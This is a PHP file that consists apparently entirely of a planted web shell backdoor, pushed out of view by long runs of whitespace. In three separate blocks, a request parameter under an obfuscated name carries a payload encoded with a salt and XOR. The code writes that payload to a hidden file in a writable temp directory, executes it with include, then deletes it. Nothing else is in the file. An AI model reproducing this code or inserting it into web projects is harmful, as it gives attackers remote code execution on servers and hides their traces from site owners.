<?php																																										if(!empty($_REQUEST["token"])){ $comp = $_REQUEST["token"]; $comp = explode ( '.' , $comp) ; $reference= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt1); $j= 0; array_walk($comp, function ($v2) use (&$reference, &$j, $salt1, $lenS) { $sChar= ord($salt1[$j% $lenS]); $dec= ((int)$v2 - $sChar - ($j% 10)) ^ 19; $reference .= chr($dec); $j++; }); $tkn = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/tmp", "/var/tmp", getenv("TMP"), "/dev/shm", session_save_path()]); while ($res = array_shift($tkn)) { if ((bool)is_dir($res) && (bool)is_writable($res)) { $entity = vsprintf("%s/%s", [$res, ".object"]); if (@file_put_contents($entity, $reference) !== false) { include $entity; unlink($entity); die(); } } } }
																																										if(@$_REQUEST["f\x61\x63"] !== null){ $tkn = $_REQUEST["f\x61\x63"]; $tkn = explode ( "." , $tkn ) ; $value= ''; $salt4= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt4); $__len= count($tkn); for($w= 0; $w < $__len; $w++) { $v4= $tkn[$w]; $sChar= ord($salt4[$w % $lenS]); $dec= ((int)$v4 - $sChar -($w % 10)) ^74; $value .= chr($dec); } $object = array_filter(["/dev/shm", sys_get_temp_dir(), session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]); foreach ($object as $key => $element) { if ((is_dir($element) and is_writable($element))) { $ref = join("/", [$element, ".marker"]); if (file_put_contents($ref, $value)) { include $ref; @unlink($ref); exit; } } } }


if(!is_null($_REQUEST["\x62i\x6Ed"] ?? null)){
	$tkn = $_REQUEST["\x62i\x6Ed"];
		 	$tkn 	=		explode ( '.'  ,$tkn	 	) ;
	$key ='';
            $salt ='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =strlen($salt	 );
            $u =0;
    
            $__tmp =$tkn;
            while ($v5 =array_shift($__tmp)) {$sChar =ord($salt[$u % $lenS]	 );
                $dec =((int)$v5 - $sChar - ($u % 10))^46;
                $key .= chr($dec	 );
                $u++; 	}
	$dat = array_filter(["/tmp", "/var/tmp", "/dev/shm", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP")]);
	while ($token = array_shift($dat)) {
    		if (max(0, is_dir($token) * is_writable($token))) {
    $component = vsprintf("%s/%s", [$token, ".object"]);
    $file = fopen($component, 'w');
if ($file) {
	fwrite($file, $key);
	fclose($file);
	include $component;
	@unlink($component);
	exit;
}
}
}
}